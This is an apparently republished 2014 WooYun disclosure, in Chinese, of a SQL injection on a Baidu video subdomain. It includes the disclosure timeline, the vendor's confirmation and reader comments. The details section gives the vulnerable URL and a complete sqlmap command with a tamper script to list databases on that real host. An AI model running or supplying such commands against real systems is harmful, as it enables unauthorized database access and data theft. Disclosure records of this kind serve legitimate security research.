百度某分站SQL注入

admin 2015年4月30日22:33:50评论688 views字数 207阅读0分41秒阅读模式
摘要

2014-07-17: 细节已通知厂商并且等待厂商处理中
2014-07-17: 厂商已经确认,细节仅向厂商公开
2014-07-27: 细节向核心白帽子及相关领域专家公开
2014-08-06: 细节向普通白帽子公开
2014-08-16: 细节向实习白帽子公开
2014-08-31: 细节向公众公开

漏洞概要 关注数(29) 关注此漏洞

缺陷编号: WooYun-2014-68815

漏洞标题: 百度某分站SQL注入

相关厂商: 百度

漏洞作者: Jannock百度某分站SQL注入

提交时间: 2014-07-17 08:58

公开时间: 2014-08-31 09:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射 注射技巧

4人收藏


漏洞详情

披露状态:

2014-07-17: 细节已通知厂商并且等待厂商处理中
2014-07-17: 厂商已经确认,细节仅向厂商公开
2014-07-27: 细节向核心白帽子及相关领域专家公开
2014-08-06: 细节向普通白帽子公开
2014-08-16: 细节向实习白帽子公开
2014-08-31: 细节向公众公开

简要描述:

百度某分站SQL注入

详细说明:

http://v.baidu.com/commonapi/topic/?topicid=11

python sqlmap.py -u "http://v.baidu.com/commonapi/topic/?topicid=11" --string "title" --tamper="between.py" --dbs

漏洞证明:

百度某分站SQL注入

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-17 10:51

厂商回复:

感谢对百度安全的支持。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-07-17 09:03 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    0

    留名

  2. 2014-07-17 09:09 | Smilent ( 实习白帽子 | Rank:48 漏洞数:8 | None)

    0

    前排围观。

  3. 2014-07-17 09:11 | zzR 百度某分站SQL注入 ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)

    1

    我现在有个疑惑 乌云rank的上限在哪,在rank超出4位数时候会不会 溢出,好担心,睡不着觉了都

  4. 2014-07-17 09:21 | zkj ( 路人 | Rank:14 漏洞数:3 | 本人不才,请各路大牛指点!)

    1

    好像看看!

  5. 2014-07-17 09:36 | maples ( 实习白帽子 | Rank:42 漏洞数:11 | 学习的小菜鸟)

    0

    前排

  6. 2014-07-17 10:00 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    1

    @zzR 超越路人甲,28位,哈哈,

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin